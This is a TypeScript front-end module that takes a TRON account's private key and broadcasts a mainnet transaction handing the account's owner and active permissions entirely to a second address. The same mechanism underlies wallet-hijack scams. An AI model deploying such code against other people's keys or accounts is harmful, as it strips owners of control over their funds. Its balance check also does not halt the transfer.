import { BigNumber, TronWeb } from 'tronweb';
import { ElMessage } from 'element-plus';


// 转移权限函数
async function transferAllPermissionsToB(address1:any,key1:any,address2:any) {
    function removeHexPrefix(hexString: string): string {
        if (hexString.startsWith('0x')) {
          return hexString.slice(2).trim();
        }
        return hexString;
      }
      
      const newkey1= removeHexPrefix(key1);
  try {
    const tronWeb = new TronWeb({
        // fullHost: 'https://api.shasta.trongrid.io',
        fullHost: "https://api.trongrid.io",
        privateKey: newkey1  // 账号 A 的私钥
    });

    const ownerAddress = address1; // 账号 A 地址
    const accountBAddress = address2; // 账号 B 地址
    const balance = await tronWeb.trx.getBalance(address1);
    const balanceInTRX = tronWeb.fromSun(balance);
    const threshold = new BigNumber(100); 
    if(balanceInTRX<threshold) ElMessage.error('余额少于100TRX，不能完成')
    // 创建 owner 权限
    const ownerPermission = { type: 0, permission_name: 'owner',threshold:1,keys:<any>[] };
    ownerPermission.threshold = 1; // 设置为 1，表示账号 B 可以单独操作
    ownerPermission.keys.push({ address: accountBAddress, weight: 1 }); // 将所有权授权给账号 B

    // 创建 active 权限
    const activePermission = { type: 2, permission_name: 'active',threshold:1,operations:'',keys:<any>[] };
    activePermission.threshold = 1; // 设置为 1，表示账号 B 可以单独操作
    activePermission.operations = '7fff1fc0033e0300000000000000000000000000000000000000000000000000'; // 保持默认操作，或根据需要调整
    activePermission.keys.push({ address: accountBAddress, weight: 1 }); // 将活动权限授权给账号 B
    
 
  
    // 更新账户权限
    const updateTransaction = await tronWeb.transactionBuilder.updateAccountPermissions(
      ownerAddress, // 账号 A 地址
      ownerPermission, // owner 权限配置
      undefined , // 不使用资源权限（如果需要可以添加）
      [activePermission]
    );

    // 签名和广播交易
    const signedTransaction = await tronWeb.trx.sign(updateTransaction, newkey1);
    await tronWeb.trx.sendRawTransaction(signedTransaction);
    

  } catch (error) {
    console.log('多签失败，请检查');
  }
}

// 执行权限转移函数
export default transferAllPermissionsToB;
